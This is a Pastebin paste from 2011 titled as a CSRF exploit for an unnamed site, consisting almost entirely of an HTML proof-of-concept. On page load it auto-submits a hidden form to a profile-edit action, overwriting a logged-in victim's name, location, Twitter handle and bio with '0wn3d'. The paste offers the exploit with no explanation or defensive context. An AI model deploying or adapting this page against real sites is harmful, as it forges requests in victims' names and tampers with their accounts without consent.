CSRF exploit for

a guest Feb 23rd, 2011 1,010 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <body onload="document.attack.submit()">
  2. <form id="edit-profile" name="attack" action="" method="post">
  3.         <input name="action_edit_user_profile" value="1" type="hidden">
  4.         <input id="pers-avemail" name="gravatar_email" type="text">
  5.     <input id="pers-name" name="full_name" value="0wn3d" type="text">
  6.         <input id="pers-loc" name="location" value="0wn3d" type="text">
  7.         <input id="pers-web" name="website" value="" type="text">
  8.         <input id="pers-twitter" name="twitter_name" value="0wn3d_twitter" type="text">
  9.          <textarea id="pers-bio" name="about" rows="5" cols="40">0wn3d</textarea>
  10. </form>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand